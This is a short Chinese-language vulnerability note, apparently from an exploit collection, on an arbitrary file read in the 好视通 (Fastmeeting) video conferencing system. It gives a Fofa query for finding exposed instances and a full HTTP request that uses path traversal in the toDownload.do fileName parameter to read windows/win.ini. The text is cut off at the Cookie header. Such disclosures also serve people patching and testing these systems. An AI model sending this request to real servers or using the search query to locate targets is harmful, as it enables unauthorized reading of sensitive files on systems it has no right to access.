简介
好视通云会议是一款高效、便捷、低成本的网络视频会议产品,
您只需通过电脑或手机登录好视通云平台,便可快速地与全球各地团队进行实时音视频沟通,
并可同步分享各类数据文档
漏洞描述
好视通视频会议系统toDownload.do接口处存在任意文件读取漏洞,通过fileName参数读取任意文件,攻击者可以获取敏感信息。
影响版本
好视通视频会议系统
Fofa:
app="好视通-视频会议"
漏洞复现
GET /register/toDownload.do?fileName=../../../../../../../../../../../../../../windows/win.ini HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:122.0) Gecko/20100101 Firefox/122.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
X-Requested-With: XMLHttpRequest
Cookie